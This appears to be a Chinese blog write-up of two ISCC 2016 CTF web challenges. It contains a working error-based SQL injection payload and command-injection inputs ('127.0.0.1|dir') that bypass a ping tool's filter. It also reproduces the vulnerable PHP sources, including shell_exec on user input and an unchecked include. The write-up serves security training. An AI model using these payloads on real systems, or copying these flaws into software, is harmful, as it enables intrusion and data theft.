偶然看到的比赛,我等渣渣跟风做两题,剩下的题目工作太忙没有时间继续做。

第1题 sql注入:

题目知识

   考察sql注入知识,题目地址:http://101.200.145.44/web1//index.php

做题过程

第一步:注入Playload

    user=flag&pass=' or updatexml(1,concat(0x7e,(select pw from user limit 1,1 )),0)# '

第二步:注入效果

    Masel's secure site 重置数据库 Error: XPATH syntax error: '~*75DBBA7B5806E761411'

第三步:获取源码,得知用户名为flag,使用注入出的密码登录可得到flag

    用户名为flag 密码为:*75DBBA7B5806E761411

    Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

相关源码 

http://101.200.145.44/web1//index.php.txt

<html>

<head>

Masel's secure site

</head>

<body>

<a href="setup-db.php">重置数据库</a>

<?php

include("auth.php");

$servername = $host;

$username = $dbuser;

$password = $dbpass;

$database = $dbname;

error_reporting(0);

if($_POST["user"] && $_POST["pass"]) {

	$conn = mysqli_connect($servername, $username, $password, $database);

	if ($conn->connect_error) {

		die("Connection failed: " . mysqli_error($conn));

}

$user = $_POST["user"];

$pass = $_POST["pass"];

$sql = "select user from user where pw='$pass'";

//echo $sql;

$query = mysqli_query($conn,$sql);

if (!$query) {

	printf("Error: %s\n", mysqli_error($conn));

	exit();

}

$row = mysqli_fetch_array($query);

//echo $row["pw"];

if ($row[user]){

	if ($row[user] == "flag" && $user=="flag") {

		echo "<p>Logged in! Flag: ****************** </p>";

	}

	else{

		echo "<p>Password is right, but it's not for the flag </p>";

	}

}

else {

    echo("<p>Wrong password!</p>");

  }

}

?>

<form method=post action=index.php>

<input type=text name=user value="Username">

<input type=password name=pass value="Password">

<input type=submit>

</form>

</body>

<a href="index.php.txt">Source</a>

</html>

key

  1. Loggedin!Flag:5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b

第2题:命令执行

题目知识

   考察命令执行的绕过,题目地址:http://101.200.145.44/web2//index.php

做题过程

第一步:得到文件名

    127.0.0.1|dir


    127.0.0.1&&dir

执行结果
1C9976C230DA289C1C359CD2A7C02D48  index.php  index.php.txt

第二步:再次得到文件名

    127.0.0.1|dir 1C9976C230DA289C1C359CD2A7C02D48

执行结果
flag.php

第三步:直接访问

  1. 连接URL地址直接访问
  2. http://101.200.145.44/web2/1C9976C230DA289C1C359CD2A7C02D48/flag.php

相关源码

<?php

header("Content-type: text/html; charset=utf-8");

?>

<html>

<head>

<title></title>

</head>

<body>

<div align="center">

	<h1 al>我刚做了一个ping命令的小工具,快试一下吧!</h1>

	<div >

		<p>请输入目标IP</p>

		<form name="ping" action="index.php" method="post">

			<input type="text" name="ip" size="30">

			<input type="submit" value="submit" name="submit">

		</form>

	</div>

<div>

</body>

</html>

<?php

if( isset( $_POST[ 'submit' ] ) ) {

	$target = $_REQUEST[ 'ip' ];

	if(preg_match('/dir|cd|^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/',$target))

	{

		// Determine OS and execute the ping command.

		if (stristr(php_uname('s'), 'Windows NT')) { 

			$cmd = shell_exec( 'ping  ' . $target );

			echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';

		} else

		{

			$cmd = shell_exec( 'ping  -c 3 ' . $target );

			echo '<pre>'.iconv('GB2312', 'UTF-8',$cmd).'</pre>';

		}

	}

	else

		echo "输入格式不正确!";

}

if( isset($_GET['file']))

{

	include($_GET['file']);

}

?>

key

  1. flag{0d143dcd-5b29-4f4f-9b16-73665aeb45a8}

【CTF WEB】ISCC 2016 web 2题记录的更多相关文章

  1. [原题复现]-HITCON 2016 WEB《babytrick》[反序列化]

    前言 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick(复现) 原题 index.php 1 <?php 2 3 inc ...

  2. Web前端错题模糊题记录

    title: Web前端错题模糊题记录 toc: true date: 2018-09-20 10:04:36 categories: Web tags: HTML CSS JavaScript HT ...

  3. 攻防世界Web刷题记录(进阶区)

    攻防世界Web刷题记录(进阶区) 1.baby_web 发现去掉URLhttp://111.200.241.244:51461/1.php后面的1.php,还是会跳转到http://111.200.2 ...

  4. 攻防世界Web刷题记录(新手区)

    攻防世界Web刷题记录(新手区) 1.ViewSource 题如其名 Fn + F12 2.get post 3.robots robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个 ...

  5. 攻防世界 web 新手练习 刷题记录

    1.view_source 既然让看源码,那就F12直接就能看到. 2.robots 先百度去简单了解一下robots协议 robots协议(robots.txt),robots.txt文件在网站根目 ...

  6. Velocity China 2016 Web 性能与运维大会:构建快速、可扩展的弹性网站

    Velocity China 2016 Web 性能与运维大会是一场关于构建快速.可扩展的弹性网站所需要的Web性能.运维及开发运维的训练.大会将于2016年12月1日在北京拉开帷幕,此次大会被众多业 ...

  7. WEB应用打成jar包全记录

    内容属原创,转载请注明出处 题外 由于项目的需求—不管是怎么产生的这个需求—总之,需要支持把一个web应用打成jar包供其他应用使用,这就有了下面的过程. 这个过程里用到了Spring和SpringM ...

  8. 刷题记录:[0CTF 2016]piapiapia

    目录 刷题记录:[0CTF 2016]piapiapia 一.涉及知识点 1.数组绕过正则及相关 2.改变序列化字符串长度导致反序列化漏洞 二.解题方法 刷题记录:[0CTF 2016]piapiap ...

  9. Web初学-入门和tomcat介绍记录

    一.WEB开发的相关知识 WEB,在英语中web即表示网页的意思,它用于表示Internet主机上供外界访问的资源. Internet上供外界访问的Web资源分为: 静态web资源(如html 页面) ...

随机推荐

  1. day11 作用域

    返回值可以任何类型,返回可以是函数,返回函数还可以再被调用仅仅返回函数是无法运行的.要运行需要加上()没有返回值的时候,默认返回值为空,None def test1(): print("in ...

  2. AGC 016 F - Games on DAG(状压dp)

    题意 给你一个有 \(n\) 个点 \(m\) 条边 DAG 图,点的标号和拓扑序一致. 现在有两个人进行博弈,有两个棋子分别在 \(1, 2\) 号点上,需要不断移动到它指向的点上. 如果当前两个点 ...

  3. 自学Linux Shell16.3-函数递归+创建库

    点击返回 自学Linux命令行与Shell脚本之路 16.3-函数递归+创建库 1. 函数递归 递归调用函数是指函数调用自身进行求解. 通常,递归函数有基值,函数最终递推到达该值. 许多高级数学算法使 ...

  4. Status: Checked in and viewable by authorized users 出现在sharepoint 2013 home 页面

    点击home页面上方的publish-> publishing->publish

  5. 洛谷 P1121 环状最大两段子段和 解题报告

    P1121 环状最大两段子段和 题目描述 给出一段环状序列,即认为\(A_1\)和\(A_N\)是相邻的,选出其中连续不重叠且非空的两段使得这两段和最大. 输入输出格式 输入格式: 第一行是一个正整数 ...

  6. 洛谷 P2317 [HNOI2005]星际贸易 解题报告

    P2317 [HNOI2005]星际贸易 题目描述 输入输出格式 输入格式: 输出格式: 如果可以找到这样的方案,那么输出文件output.txt中包含两个整数X和Y.X表示贸易额,Y表示净利润并且两 ...

  7. Android -- 面试 -- 数据库升级策略

    升级:重写onUpgrade方法 确定 相邻版本 的差别,从版本1开始依次迭代更新,先执行v1到v2,再v2到v3…… 为 每个版本 确定与现在数据库的差别,为每个case撰写专门的升级代码. 降级 ...

  8. [ZJOI2007]矩阵游戏——非常漂亮的二分图转化

    题意: 小 Q 是一个非常聪明的孩子,除了国际象棋,他还很喜欢玩一个电脑益智游戏――矩阵游戏.矩阵游戏在一个 N×N 黑白方阵进行(如同国际象棋一般,只是颜色是随意的).每次可以对该矩阵进行两种操作: ...

  9. 20190311 Java处理JSON的常用类库

    1. Gson 1.1. 背景 谷歌 1.2. 简单使用 Gson gson = new Gson(); System.out.println(gson.toJson(1)); // ==> 1 ...

  10. idea常用的插件

    ignore 插件 可以自动生成.ignore文件   非常的实用 gitee 插件 搜所gitee安装即可  码云的插件 maven helper 插件 idea 中解决maven 包冲突的问题 a ...